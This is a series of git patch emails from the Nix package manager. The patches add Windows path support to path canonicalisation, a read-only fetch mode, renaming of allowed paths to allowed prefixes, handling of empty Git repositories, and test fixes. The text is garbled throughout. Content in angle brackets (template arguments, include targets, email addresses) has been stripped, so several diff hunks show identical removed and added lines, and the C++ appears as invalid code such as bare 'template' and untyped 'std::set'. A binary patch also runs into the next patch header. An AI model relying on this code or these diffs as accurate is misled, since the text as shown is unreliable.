From: John Ericson 
Date: Mon, 29 Jan 2024 17:16:18 -0500
Subject: [PATCH 480/654] Factor out the Unix-specific parts of
 `canonPathInner`

This prepares the code to also support Windows paths in the next commit.
---
 src/libutil/canon-path.cc     |  2 +-
 src/libutil/file-path-impl.hh | 52 +++++++++++++++++++++++++++++------
 src/libutil/file-system.cc    |  2 +-
 3 files changed, 45 insertions(+), 11 deletions(-)

diff --git a/src/libutil/canon-path.cc b/src/libutil/canon-path.cc
index fcd53862b..27f048697 100644
--- a/src/libutil/canon-path.cc
+++ b/src/libutil/canon-path.cc
@@ -8,7 +8,7 @@ CanonPath CanonPath::root = CanonPath("/");
 
 static std::string absPathPure(std::string_view path)
 {
-    return canonPathInner(path, [](auto &, auto &){});
+    return canonPathInner(path, [](auto &, auto &){});
 }
 
 CanonPath::CanonPath(std::string_view raw)
diff --git a/src/libutil/file-path-impl.hh b/src/libutil/file-path-impl.hh
index 39159c7c2..941d433e0 100644
--- a/src/libutil/file-path-impl.hh
+++ b/src/libutil/file-path-impl.hh
@@ -10,6 +10,39 @@
 
 namespace nix {
 
+/**
+ * Unix-style path primitives.
+ *
+ * Nix's own "logical" paths are always Unix-style. So this is always
+ * used for that, and additionally used for native paths on Unix.
+ */
+struct UnixPathTrait
+{
+    using CharT = char;
+
+    using String = std::string;
+
+    using StringView = std::string_view;
+
+    constexpr static char preferredSep = '/';
+
+    static inline bool isPathSep(char c)
+    {
+        return c == '/';
+    }
+
+    static inline size_t findPathSep(StringView path, size_t from = 0)
+    {
+        return path.find('/', from);
+    }
+
+    static inline size_t rfindPathSep(StringView path, size_t from = StringView::npos)
+    {
+        return path.rfind('/', from);
+    }
+};
+
+
 /**
  * Core pure path canonicalization algorithm.
  *
@@ -24,25 +57,26 @@ namespace nix {
  *   This is a chance to modify those two paths in arbitrary way, e.g. if
  *   "result" points to a symlink.
  */
-typename std::string canonPathInner(
-    std::string_view remaining,
+template
+typename PathDict::String canonPathInner(
+    typename PathDict::StringView remaining,
     auto && hookComponent)
 {
     assert(remaining != "");
 
-    std::string result;
+    typename PathDict::String result;
     result.reserve(256);
 
     while (true) {
 
         /* Skip slashes. */
-        while (!remaining.empty() && remaining[0] == '/')
+        while (!remaining.empty() && PathDict::isPathSep(remaining[0]))
             remaining.remove_prefix(1);
 
         if (remaining.empty()) break;
 
         auto nextComp = ({
-            auto nextPathSep = remaining.find('/');
+            auto nextPathSep = PathDict::findPathSep(remaining);
             nextPathSep == remaining.npos ? remaining : remaining.substr(0, nextPathSep);
         });
 
@@ -53,14 +87,14 @@ typename std::string canonPathInner(
         /* If `..', delete the last component. */
         else if (nextComp == "..")
         {
-            if (!result.empty()) result.erase(result.rfind('/'));
+            if (!result.empty()) result.erase(PathDict::rfindPathSep(result));
             remaining.remove_prefix(2);
         }
 
         /* Normal component; copy it. */
         else {
-            result += '/';
-            if (const auto slash = remaining.find('/'); slash == result.npos) {
+            result += PathDict::preferredSep;
+            if (const auto slash = PathDict::findPathSep(remaining); slash == result.npos) {
                 result += remaining;
                 remaining = {};
             } else {
@@ -73,7 +107,7 @@ typename std::string canonPathInner(
     }
 
     if (result.empty())
-        result = "/";
+        result = typename PathDict::String { PathDict::preferredSep };
 
     return result;
 }
diff --git a/src/libutil/file-system.cc b/src/libutil/file-system.cc
index 3c019a9ed..ff83bc4ea 100644
--- a/src/libutil/file-system.cc
+++ b/src/libutil/file-system.cc
@@ -78,7 +78,7 @@ Path canonPath(PathView path, bool resolveSymlinks)
        arbitrary (but high) limit to prevent infinite loops. */
     unsigned int followCount = 0, maxFollow = 1024;
 
-    return canonPathInner(
+    return canonPathInner(
         path,
         [&followCount, &temp, maxFollow, resolveSymlinks]
         (std::string & result, std::string_view & remaining) {

From 319ec6f84accb7342160b856185402dcdebbaba9 Mon Sep 17 00:00:00 2001
From: John Ericson 
Date: Sun, 14 Jan 2024 14:30:25 -0500
Subject: [PATCH 481/654] Support Windows paths in `canonPath` and `absPath`

`canonPath` and `absPath` work on native paths, and so should switch
between supporting Unix paths and Windows paths accordingly.

The templating is because `CanonPath`, which shares the implementation,
should always be Unix style. It is the pure "nix-native" path type for
virtual file operations --- it is part of Nix's "business logic", and
should not vary with the host OS accordingly.
---
 src/libutil/file-path-impl.hh | 61 +++++++++++++++++++++++++++++++++++
 src/libutil/file-system.cc    | 17 ++++++++--
 tests/unit/libutil/tests.cc   | 30 ++++++++++-------
 3 files changed, 94 insertions(+), 14 deletions(-)

diff --git a/src/libutil/file-path-impl.hh b/src/libutil/file-path-impl.hh
index 941d433e0..4c90150fd 100644
--- a/src/libutil/file-path-impl.hh
+++ b/src/libutil/file-path-impl.hh
@@ -43,6 +43,67 @@ struct UnixPathTrait
 };
 
 
+/**
+ * Windows-style path primitives.
+ *
+ * The character type is a parameter because while windows paths rightly
+ * work over UTF-16 (*) using `wchar_t`, at the current time we are
+ * often manipulating them converted to UTF-8 (*) using `char`.
+ *
+ * (Actually neither is guaranteed to be valid unicode; both are
+ * arbitrary non-0 8- or 16-bit bytes. But for characters with special
+ * meaning like '/', '\\', ':', etc., we refer to an encoding scheme,
+ * and also for the sake of UIs that display paths as text.)
+ */
+template
+struct WindowsPathTrait
+{
+    using CharT = CharT0;
+
+    using String = std::basic_string;
+
+    using StringView = std::basic_string_view;
+
+    constexpr static CharT preferredSep = '\\';
+
+    static inline bool isPathSep(CharT c)
+    {
+        return c == '/' || c == preferredSep;
+    }
+
+    static size_t findPathSep(StringView path, size_t from = 0)
+    {
+        size_t p1 = path.find('/', from);
+        size_t p2 = path.find(preferredSep, from);
+        return p1 == String::npos ? p2 :
+               p2 == String::npos ? p1 :
+               std::min(p1, p2);
+    }
+
+    static size_t rfindPathSep(StringView path, size_t from = String::npos)
+    {
+        size_t p1 = path.rfind('/', from);
+        size_t p2 = path.rfind(preferredSep, from);
+        return p1 == String::npos ? p2 :
+               p2 == String::npos ? p1 :
+               std::max(p1, p2);
+    }
+};
+
+
+/**
+ * @todo Revisit choice of `char` or `wchar_t` for `WindowsPathTrait`
+ * argument.
+ */
+using NativePathTrait =
+#ifdef _WIN32
+    WindowsPathTrait
+#else
+    UnixPathTrait
+#endif
+    ;
+
+
 /**
  * Core pure path canonicalization algorithm.
  *
diff --git a/src/libutil/file-system.cc b/src/libutil/file-system.cc
index ff83bc4ea..b0a3f0797 100644
--- a/src/libutil/file-system.cc
+++ b/src/libutil/file-system.cc
@@ -22,10 +22,14 @@ namespace fs = std::filesystem;
 
 namespace nix {
 
-/** Treat the string as possibly an absolute path, by inspecting the start of it. Return whether it was probably intended to be absolute. */
+/**
+ * Treat the string as possibly an absolute path, by inspecting the
+ * start of it. Return whether it was probably intended to be
+ * absolute.
+ */
 static bool isAbsolute(PathView path)
 {
-    return !path.empty() && path[0] == '/';
+    return fs::path { path }.is_absolute();
 }
 
 
@@ -69,6 +73,9 @@ Path canonPath(PathView path, bool resolveSymlinks)
     if (!isAbsolute(path))
         throw Error("not an absolute path: '%1%'", path);
 
+    // For Windows
+    auto rootName = fs::path { path }.root_name();
+
     /* This just exists because we cannot set the target of `remaining`
        (the callback parameter) directly to a newly-constructed string,
        since it is `std::string_view`. */
@@ -78,7 +85,7 @@ Path canonPath(PathView path, bool resolveSymlinks)
        arbitrary (but high) limit to prevent infinite loops. */
     unsigned int followCount = 0, maxFollow = 1024;
 
-    return canonPathInner(
+    auto ret = canonPathInner(
         path,
         [&followCount, &temp, maxFollow, resolveSymlinks]
         (std::string & result, std::string_view & remaining) {
@@ -99,6 +106,10 @@ Path canonPath(PathView path, bool resolveSymlinks)
                 }
             }
         });
+
+    if (!rootName.empty())
+        ret = rootName.string() + std::move(ret);
+    return ret;
 }
 
 
diff --git a/tests/unit/libutil/tests.cc b/tests/unit/libutil/tests.cc
index 568f03f70..4406fd184 100644
--- a/tests/unit/libutil/tests.cc
+++ b/tests/unit/libutil/tests.cc
@@ -9,6 +9,14 @@
 
 #include 
 
+#ifdef _WIN32
+# define FS_SEP "\\"
+# define FS_ROOT "C:" FS_SEP // Need a mounted one, C drive is likely
+#else
+# define FS_SEP "/"
+# define FS_ROOT FS_SEP
+#endif
+
 namespace nix {
 
 /* ----------- tests for util.hh ------------------------------------------------*/
@@ -18,9 +26,9 @@ namespace nix {
      * --------------------------------------------------------------------------*/
 
     TEST(absPath, doesntChangeRoot) {
-        auto p = absPath("/");
+        auto p = absPath(FS_ROOT);
 
-        ASSERT_EQ(p, "/");
+        ASSERT_EQ(p, FS_ROOT);
     }
 
 
@@ -53,11 +61,11 @@ namespace nix {
 
 
     TEST(absPath, pathIsCanonicalised) {
-        auto path = "/some/path/with/trailing/dot/.";
+        auto path = FS_ROOT "some/path/with/trailing/dot/.";
         auto p1 = absPath(path);
         auto p2 = absPath(p1);
 
-        ASSERT_EQ(p1, "/some/path/with/trailing/dot");
+        ASSERT_EQ(p1, FS_ROOT "some" FS_SEP "path" FS_SEP "with" FS_SEP "trailing" FS_SEP "dot");
         ASSERT_EQ(p1, p2);
     }
 
@@ -66,24 +74,24 @@ namespace nix {
      * --------------------------------------------------------------------------*/
 
     TEST(canonPath, removesTrailingSlashes) {
-        auto path = "/this/is/a/path//";
+        auto path = FS_ROOT "this/is/a/path//";
         auto p = canonPath(path);
 
-        ASSERT_EQ(p, "/this/is/a/path");
+        ASSERT_EQ(p, FS_ROOT "this" FS_SEP "is" FS_SEP "a" FS_SEP "path");
     }
 
     TEST(canonPath, removesDots) {
-        auto path = "/this/./is/a/path/./";
+        auto path = FS_ROOT "this/./is/a/path/./";
         auto p = canonPath(path);
 
-        ASSERT_EQ(p, "/this/is/a/path");
+        ASSERT_EQ(p, FS_ROOT "this" FS_SEP "is" FS_SEP "a" FS_SEP "path");
     }
 
     TEST(canonPath, removesDots2) {
-        auto path = "/this/a/../is/a////path/foo/..";
+        auto path = FS_ROOT "this/a/../is/a////path/foo/..";
         auto p = canonPath(path);
 
-        ASSERT_EQ(p, "/this/is/a/path");
+        ASSERT_EQ(p, FS_ROOT "this" FS_SEP "is" FS_SEP "a" FS_SEP "path");
     }
 
     TEST(canonPath, requiresAbsolutePath) {
@@ -197,7 +205,7 @@ namespace nix {
      * --------------------------------------------------------------------------*/
 
     TEST(pathExists, rootExists) {
-        ASSERT_TRUE(pathExists("/"));
+        ASSERT_TRUE(pathExists(FS_ROOT));
     }
 
     TEST(pathExists, cwdExists) {

From 6162105675762a394603dbbf39cb1fa55065fec3 Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Tue, 20 Feb 2024 10:28:44 +0100
Subject: [PATCH 482/654] Don't say "copying X to the store" in read-only mode

---
 src/libfetchers/fetch-to-store.cc | 7 +++++--
 1 file changed, 5 insertions(+), 2 deletions(-)

diff --git a/src/libfetchers/fetch-to-store.cc b/src/libfetchers/fetch-to-store.cc
index c27880662..f5c740266 100644
--- a/src/libfetchers/fetch-to-store.cc
+++ b/src/libfetchers/fetch-to-store.cc
@@ -33,12 +33,15 @@ StorePath fetchToStore(
     } else
         debug("source path '%s' is uncacheable", path);
 
-    Activity act(*logger, lvlChatty, actUnknown, fmt("copying '%s' to the store", path));
+    auto readOnly = settings.readOnlyMode;
+
+    Activity act(*logger, lvlChatty, actUnknown,
+        fmt(readOnly ? "hashing '%s'" : "copying '%s' to the store", path));
 
     auto filter2 = filter ? *filter : defaultPathFilter;
 
     auto storePath =
-        settings.readOnlyMode
+        readOnly
         ? store.computeStorePath(
             name, *path.accessor, path.path, method, HashAlgorithm::SHA256, {}, filter2).first
         : store.addToStore(

From d52d91fe7a349d24a83b8698b3d04874c9f52cd2 Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Tue, 20 Feb 2024 11:21:28 +0100
Subject: [PATCH 483/654] AllowListInputAccessor: Clarify that the "allowed
 paths" are actually allowed prefixes

E.g. adding "/" will allow access to the root and *everything below it*.
---
 src/libexpr/eval.cc                         |  4 ++--
 src/libfetchers/filtering-input-accessor.cc | 16 ++++++++--------
 src/libfetchers/filtering-input-accessor.hh |  9 +++++----
 3 files changed, 15 insertions(+), 14 deletions(-)

diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc
index 6fc9df237..41b6f5c85 100644
--- a/src/libexpr/eval.cc
+++ b/src/libexpr/eval.cc
@@ -467,13 +467,13 @@ EvalState::~EvalState()
 void EvalState::allowPath(const Path & path)
 {
     if (auto rootFS2 = rootFS.dynamic_pointer_cast())
-        rootFS2->allowPath(CanonPath(path));
+        rootFS2->allowPrefix(CanonPath(path));
 }
 
 void EvalState::allowPath(const StorePath & storePath)
 {
     if (auto rootFS2 = rootFS.dynamic_pointer_cast())
-        rootFS2->allowPath(CanonPath(store->toRealPath(storePath)));
+        rootFS2->allowPrefix(CanonPath(store->toRealPath(storePath)));
 }
 
 void EvalState::allowAndSetStorePathString(const StorePath & storePath, Value & v)
diff --git a/src/libfetchers/filtering-input-accessor.cc b/src/libfetchers/filtering-input-accessor.cc
index 087a100af..32343abc4 100644
--- a/src/libfetchers/filtering-input-accessor.cc
+++ b/src/libfetchers/filtering-input-accessor.cc
@@ -51,33 +51,33 @@ void FilteringInputAccessor::checkAccess(const CanonPath & path)
 
 struct AllowListInputAccessorImpl : AllowListInputAccessor
 {
-    std::set allowedPaths;
+    std::set allowedPrefixes;
 
     AllowListInputAccessorImpl(
         ref next,
-        std::set && allowedPaths,
+        std::set && allowedPrefixes,
         MakeNotAllowedError && makeNotAllowedError)
         : AllowListInputAccessor(SourcePath(next), std::move(makeNotAllowedError))
-        , allowedPaths(std::move(allowedPaths))
+        , allowedPrefixes(std::move(allowedPrefixes))
     { }
 
     bool isAllowed(const CanonPath & path) override
     {
-        return path.isAllowed(allowedPaths);
+        return path.isAllowed(allowedPrefixes);
     }
 
-    void allowPath(CanonPath path) override
+    void allowPrefix(CanonPath prefix) override
     {
-        allowedPaths.insert(std::move(path));
+        allowedPrefixes.insert(std::move(prefix));
     }
 };
 
 ref AllowListInputAccessor::create(
     ref next,
-    std::set && allowedPaths,
+    std::set && allowedPrefixes,
     MakeNotAllowedError && makeNotAllowedError)
 {
-    return make_ref(next, std::move(allowedPaths), std::move(makeNotAllowedError));
+    return make_ref(next, std::move(allowedPrefixes), std::move(makeNotAllowedError));
 }
 
 bool CachingFilteringInputAccessor::isAllowed(const CanonPath & path)
diff --git a/src/libfetchers/filtering-input-accessor.hh b/src/libfetchers/filtering-input-accessor.hh
index 8a9b206ee..8111a72c5 100644
--- a/src/libfetchers/filtering-input-accessor.hh
+++ b/src/libfetchers/filtering-input-accessor.hh
@@ -54,18 +54,19 @@ struct FilteringInputAccessor : InputAccessor
 };
 
 /**
- * A wrapping `InputAccessor` that checks paths against an allow-list.
+ * A wrapping `InputAccessor` that checks paths against a set of
+ * allowed prefixes.
  */
 struct AllowListInputAccessor : public FilteringInputAccessor
 {
     /**
-     * Grant access to the specified path.
+     * Grant access to the specified prefix.
      */
-    virtual void allowPath(CanonPath path) = 0;
+    virtual void allowPrefix(CanonPath prefix) = 0;
 
     static ref create(
         ref next,
-        std::set && allowedPaths,
+        std::set && allowedPrefixes,
         MakeNotAllowedError && makeNotAllowedError);
 
     using FilteringInputAccessor::FilteringInputAccessor;

From 9e762454cf62d0d7a6259b560cc3e340f6f5ec6e Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Tue, 20 Feb 2024 11:40:02 +0100
Subject: [PATCH 484/654] Support empty Git repositories / workdirs

Fixes #10039.
---
 src/libfetchers/git-utils.cc             | 21 ++++++++++++--------
 src/libfetchers/git.cc                   |  8 ++++++--
 src/libfetchers/memory-input-accessor.cc |  6 ++++++
 src/libfetchers/memory-input-accessor.hh |  2 ++
 tests/functional/fetchGit.sh             | 25 ++++++++++++++++++++++++
 5 files changed, 52 insertions(+), 10 deletions(-)

diff --git a/src/libfetchers/git-utils.cc b/src/libfetchers/git-utils.cc
index 4f034e9d4..037fcc365 100644
--- a/src/libfetchers/git-utils.cc
+++ b/src/libfetchers/git-utils.cc
@@ -2,6 +2,7 @@
 #include "fs-input-accessor.hh"
 #include "input-accessor.hh"
 #include "filtering-input-accessor.hh"
+#include "memory-input-accessor.hh"
 #include "cache.hh"
 #include "finally.hh"
 #include "processes.hh"
@@ -942,17 +943,21 @@ ref GitRepoImpl::getAccessor(const Hash & rev, bool exportIgnore)
 ref GitRepoImpl::getAccessor(const WorkdirInfo & wd, bool exportIgnore, MakeNotAllowedError makeNotAllowedError)
 {
     auto self = ref(shared_from_this());
+    /* In case of an empty workdir, return an empty in-memory tree. We
+       cannot use AllowListInputAccessor because it would return an
+       error for the root (and we can't add the root to the allow-list
+       since that would allow access to all its children). */
     ref fileAccessor =
-        AllowListInputAccessor::create(
-                makeFSInputAccessor(path),
-                std::set { wd.files },
-                std::move(makeNotAllowedError));
-    if (exportIgnore) {
+        wd.files.empty()
+        ? makeEmptyInputAccessor()
+        : AllowListInputAccessor::create(
+            makeFSInputAccessor(path),
+            std::set { wd.files },
+            std::move(makeNotAllowedError)).cast();
+    if (exportIgnore)
         return make_ref(self, fileAccessor, std::nullopt);
-    }
-    else {
+    else
         return fileAccessor;
-    }
 }
 
 ref GitRepoImpl::getFileSystemObjectSink()
diff --git a/src/libfetchers/git.cc b/src/libfetchers/git.cc
index bef945d54..97ef35b51 100644
--- a/src/libfetchers/git.cc
+++ b/src/libfetchers/git.cc
@@ -158,6 +158,8 @@ std::vector getPublicKeys(const Attrs & attrs)
 
 }  // end namespace
 
+static const Hash nullRev{HashAlgorithm::SHA1};
+
 struct GitInputScheme : InputScheme
 {
     std::optional inputFromURL(const ParsedURL & url, bool requireTree) const override
@@ -708,10 +710,12 @@ struct GitInputScheme : InputScheme
             if (auto ref = repo->getWorkdirRef())
                 input.attrs.insert_or_assign("ref", *ref);
 
-            auto rev = repoInfo.workdirInfo.headRev.value();
+            /* Return a rev of 000... if there are no commits yet. */
+            auto rev = repoInfo.workdirInfo.headRev.value_or(nullRev);
 
             input.attrs.insert_or_assign("rev", rev.gitRev());
-            input.attrs.insert_or_assign("revCount", getRevCount(repoInfo, repoInfo.url, rev));
+            input.attrs.insert_or_assign("revCount",
+                rev == nullRev ? 0 : getRevCount(repoInfo, repoInfo.url, rev));
 
             verifyCommit(input, repo);
         } else {
diff --git a/src/libfetchers/memory-input-accessor.cc b/src/libfetchers/memory-input-accessor.cc
index 88a2e34e8..34a801f67 100644
--- a/src/libfetchers/memory-input-accessor.cc
+++ b/src/libfetchers/memory-input-accessor.cc
@@ -20,4 +20,10 @@ ref makeMemoryInputAccessor()
     return make_ref();
 }
 
+ref makeEmptyInputAccessor()
+{
+    static auto empty = makeMemoryInputAccessor().cast();
+    return empty;
+}
+
 }
diff --git a/src/libfetchers/memory-input-accessor.hh b/src/libfetchers/memory-input-accessor.hh
index 508b07722..63afadd2a 100644
--- a/src/libfetchers/memory-input-accessor.hh
+++ b/src/libfetchers/memory-input-accessor.hh
@@ -13,4 +13,6 @@ struct MemoryInputAccessor : InputAccessor
 
 ref makeMemoryInputAccessor();
 
+ref makeEmptyInputAccessor();
+
 }
diff --git a/tests/functional/fetchGit.sh b/tests/functional/fetchGit.sh
index ea90f8ebe..0583774c4 100644
--- a/tests/functional/fetchGit.sh
+++ b/tests/functional/fetchGit.sh
@@ -268,3 +268,28 @@ git -C "$repo" add hello .gitignore
 git -C "$repo" commit -m 'Bla1'
 cd "$repo"
 path11=$(nix eval --impure --raw --expr "(builtins.fetchGit ./.).outPath")
+
+# Test a workdir with no commits.
+empty="$TEST_ROOT/empty"
+git init "$empty"
+
+emptyAttrs='{ lastModified = 0; lastModifiedDate = "19700101000000"; narHash = "sha256-pQpattmS9VmO3ZIQUFn66az8GSmB4IvYhTTCFn6SUmo="; rev = "0000000000000000000000000000000000000000"; revCount = 0; shortRev = "0000000"; submodules = false; }'
+
+[[ $(nix eval --impure --expr "builtins.removeAttrs (builtins.fetchGit $empty) [\"outPath\"]") = $emptyAttrs ]]
+
+echo foo > "$empty/x"
+
+[[ $(nix eval --impure --expr "builtins.removeAttrs (builtins.fetchGit $empty) [\"outPath\"]") = $emptyAttrs ]]
+
+git -C "$empty" add x
+
+[[ $(nix eval --impure --expr "builtins.removeAttrs (builtins.fetchGit $empty) [\"outPath\"]") = '{ lastModified = 0; lastModifiedDate = "19700101000000"; narHash = "sha256-wzlAGjxKxpaWdqVhlq55q5Gxo4Bf860+kLeEa/v02As="; rev = "0000000000000000000000000000000000000000"; revCount = 0; shortRev = "0000000"; submodules = false; }' ]]
+
+# Test a repo with an empty commit.
+git -C "$empty" rm -f x
+
+git -C "$empty" config user.email "foobar@example.com"
+git -C "$empty" config user.name "Foobar"
+git -C "$empty" commit --allow-empty --allow-empty-message --message ""
+
+nix eval --impure --expr "let attrs = builtins.fetchGit $empty; in assert attrs.lastModified != 0; assert attrs.rev != \"0000000000000000000000000000000000000000\"; assert attrs.revCount == 1; true"

From 7cb4d0c5b7dee435ea4b25e0c6dec4d60ad3675f Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Tue, 20 Feb 2024 10:36:36 +0100
Subject: [PATCH 485/654] fetchToStore(): Don't always respect
 settings.readOnlyMode

It's now up to the caller whether readOnlyMode should be applied. In
some contexts (like InputScheme::fetch()), we always need to fetch.
---
 src/libcmd/installable-value.cc   | 2 +-
 src/libexpr/eval.cc               | 9 ++++++++-
 src/libexpr/primops.cc            | 9 ++++++++-
 src/libfetchers/fetch-to-store.cc | 9 ++++-----
 src/libfetchers/fetch-to-store.hh | 3 +++
 src/libfetchers/fetchers.cc       | 2 +-
 tests/functional/fetchGit.sh      | 5 ++++-
 7 files changed, 29 insertions(+), 10 deletions(-)

diff --git a/src/libcmd/installable-value.cc b/src/libcmd/installable-value.cc
index c8a3e1b21..1aa2e65c1 100644
--- a/src/libcmd/installable-value.cc
+++ b/src/libcmd/installable-value.cc
@@ -45,7 +45,7 @@ ref InstallableValue::require(ref installable)
 std::optional InstallableValue::trySinglePathToDerivedPaths(Value & v, const PosIdx pos, std::string_view errorCtx)
 {
     if (v.type() == nPath) {
-        auto storePath = fetchToStore(*state->store, v.path());
+        auto storePath = fetchToStore(*state->store, v.path(), FetchMode::Copy);
         return {{
             .path = DerivedPath::Opaque {
                 .path = std::move(storePath),
diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc
index 6fc9df237..4919ac358 100644
--- a/src/libexpr/eval.cc
+++ b/src/libexpr/eval.cc
@@ -2339,7 +2339,14 @@ StorePath EvalState::copyPathToStore(NixStringContext & context, const SourcePat
     auto dstPath = i != srcToStore.end()
         ? i->second
         : [&]() {
-            auto dstPath = fetchToStore(*store, path.resolveSymlinks(), path.baseName(), FileIngestionMethod::Recursive, nullptr, repair);
+            auto dstPath = fetchToStore(
+                *store,
+                path.resolveSymlinks(),
+                settings.readOnlyMode ? FetchMode::DryRun : FetchMode::Copy,
+                path.baseName(),
+                FileIngestionMethod::Recursive,
+                nullptr,
+                repair);
             allowPath(dstPath);
             srcToStore.insert_or_assign(path, dstPath);
             printMsg(lvlChatty, "copied source '%1%' -> '%2%'", path, store->printStorePath(dstPath));
diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc
index 8c6aeffac..89d9704ee 100644
--- a/src/libexpr/primops.cc
+++ b/src/libexpr/primops.cc
@@ -2228,7 +2228,14 @@ static void addPath(
             });
 
         if (!expectedHash || !state.store->isValidPath(*expectedStorePath)) {
-            auto dstPath = fetchToStore(*state.store, path.resolveSymlinks(), name, method, filter.get(), state.repair);
+            auto dstPath = fetchToStore(
+                *state.store,
+                path.resolveSymlinks(),
+                settings.readOnlyMode ? FetchMode::DryRun : FetchMode::Copy,
+                name,
+                method,
+                filter.get(),
+                state.repair);
             if (expectedHash && expectedStorePath != dstPath)
                 state.error(
                     "store path mismatch in (possibly filtered) path added from '%s'",
diff --git a/src/libfetchers/fetch-to-store.cc b/src/libfetchers/fetch-to-store.cc
index f5c740266..398286065 100644
--- a/src/libfetchers/fetch-to-store.cc
+++ b/src/libfetchers/fetch-to-store.cc
@@ -7,6 +7,7 @@ namespace nix {
 StorePath fetchToStore(
     Store & store,
     const SourcePath & path,
+    FetchMode mode,
     std::string_view name,
     ContentAddressMethod method,
     PathFilter * filter,
@@ -33,21 +34,19 @@ StorePath fetchToStore(
     } else
         debug("source path '%s' is uncacheable", path);
 
-    auto readOnly = settings.readOnlyMode;
-
     Activity act(*logger, lvlChatty, actUnknown,
-        fmt(readOnly ? "hashing '%s'" : "copying '%s' to the store", path));
+        fmt(mode == FetchMode::DryRun ? "hashing '%s'" : "copying '%s' to the store", path));
 
     auto filter2 = filter ? *filter : defaultPathFilter;
 
     auto storePath =
-        readOnly
+        mode == FetchMode::DryRun
         ? store.computeStorePath(
             name, *path.accessor, path.path, method, HashAlgorithm::SHA256, {}, filter2).first
         : store.addToStore(
             name, *path.accessor, path.path, method, HashAlgorithm::SHA256, {}, filter2, repair);
 
-    if (cacheKey)
+    if (cacheKey && mode == FetchMode::Copy)
         fetchers::getCache()->add(store, *cacheKey, {}, storePath, true);
 
     return storePath;
diff --git a/src/libfetchers/fetch-to-store.hh b/src/libfetchers/fetch-to-store.hh
index e5e039340..81af1e240 100644
--- a/src/libfetchers/fetch-to-store.hh
+++ b/src/libfetchers/fetch-to-store.hh
@@ -8,12 +8,15 @@
 
 namespace nix {
 
+enum struct FetchMode { DryRun, Copy };
+
 /**
  * Copy the `path` to the Nix store.
  */
 StorePath fetchToStore(
     Store & store,
     const SourcePath & path,
+    FetchMode mode,
     std::string_view name = "source",
     ContentAddressMethod method = FileIngestionMethod::Recursive,
     PathFilter * filter = nullptr,
diff --git a/src/libfetchers/fetchers.cc b/src/libfetchers/fetchers.cc
index 7f282c972..9a534c1e2 100644
--- a/src/libfetchers/fetchers.cc
+++ b/src/libfetchers/fetchers.cc
@@ -376,7 +376,7 @@ void InputScheme::clone(const Input & input, const Path & destDir) const
 std::pair InputScheme::fetch(ref store, const Input & input)
 {
     auto [accessor, input2] = getAccessor(store, input);
-    auto storePath = fetchToStore(*store, SourcePath(accessor), input2.getName());
+    auto storePath = fetchToStore(*store, SourcePath(accessor), FetchMode::Copy, input2.getName());
     return {storePath, input2};
 }
 
diff --git a/tests/functional/fetchGit.sh b/tests/functional/fetchGit.sh
index ea90f8ebe..4e71cfe8c 100644
--- a/tests/functional/fetchGit.sh
+++ b/tests/functional/fetchGit.sh
@@ -30,7 +30,10 @@ echo hello >> $TEST_ROOT/worktree/hello
 rev2=$(git -C $repo rev-parse HEAD)
 git -C $repo tag -a tag2 -m tag2
 
-# Fetch a worktree
+# Check whether fetching in read-only mode works.
+nix-instantiate --eval -E "builtins.readFile ((builtins.fetchGit file://$TEST_ROOT/worktree) + \"/hello\") == \"utrecht\\n\""
+
+# Fetch a worktree.
 unset _NIX_FORCE_HTTP
 path0=$(nix eval --impure --raw --expr "(builtins.fetchGit file://$TEST_ROOT/worktree).outPath")
 path0_=$(nix eval --impure --raw --expr "(builtins.fetchTree { type = \"git\"; url = file://$TEST_ROOT/worktree; }).outPath")

From db012d1e6395b342633ae8037841a9e751281b1e Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Mon, 19 Feb 2024 13:15:49 +0100
Subject: [PATCH 486/654] tests/functional/tarball.sh: Fix invalid file:// URLs

---
 tests/functional/tarball.sh | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/tests/functional/tarball.sh b/tests/functional/tarball.sh
index e59ee400e..391c21385 100644
--- a/tests/functional/tarball.sh
+++ b/tests/functional/tarball.sh
@@ -42,11 +42,11 @@ test_tarball() {
     nix-instantiate --strict --eval -E "!((import (fetchTree { type = \"tarball\"; url = file://$tarball; narHash = \"$hash\"; })) ? submodules)" >&2
     nix-instantiate --strict --eval -E "!((import (fetchTree { type = \"tarball\"; url = file://$tarball; narHash = \"$hash\"; })) ? submodules)" 2>&1 | grep 'true'
 
-    nix-instantiate --eval -E '1 + 2' -I fnord=file://no-such-tarball.tar$ext
-    nix-instantiate --eval -E 'with ; 1 + 2' -I fnord=file://no-such-tarball$ext
-    (! nix-instantiate --eval -E ' 1' -I fnord=file://no-such-tarball$ext)
+    nix-instantiate --eval -E '1 + 2' -I fnord=file:///no-such-tarball.tar$ext
+    nix-instantiate --eval -E 'with ; 1 + 2' -I fnord=file:///no-such-tarball$ext
+    (! nix-instantiate --eval -E ' 1' -I fnord=file:///no-such-tarball$ext)
 
-    nix-instantiate --eval -E '' -I fnord=file://no-such-tarball$ext -I fnord=.
+    nix-instantiate --eval -E '' -I fnord=file:///no-such-tarball$ext -I fnord=.
 
     # Ensure that the `name` attribute isn’t accepted as that would mess
     # with the content-addressing

From b00f412f818771c92934614e13382c3087f69587 Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Fri, 13 Oct 2023 13:21:38 +0200
Subject: [PATCH 487/654] Remove bad.tar.xz check, since libarchive doesn't
 care

---
 tests/functional/bad.tar.xz | Bin 228 -> 0 bytes
 tests/functional/tarball.sh |   5 -----
 2 files changed, 5 deletions(-)
 delete mode 100644 tests/functional/bad.tar.xz

diff --git a/tests/functional/bad.tar.xz b/tests/functional/bad.tar.xz
deleted file mode 100644
index 250a5ad1a79ee088d5976160664daad6e1a136ff..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 228
zcmVuwgxWr*GQJ}UxbD$dT
zFZcR4Oq`4c+brLa?D6R=fMJjM$?MdlXt0Pp!zwDzlSF=e({Qq}bnc_B9C}zwW!F?<
z;h>7LqPxu=kzFWj+$Z*4&0g78Yyp1kn1+nCzFC}~s1p
Date: Mon, 19 Feb 2024 13:54:40 +0100
Subject: [PATCH 488/654] PosixSourceAccessor: Support roots that are not
 directories

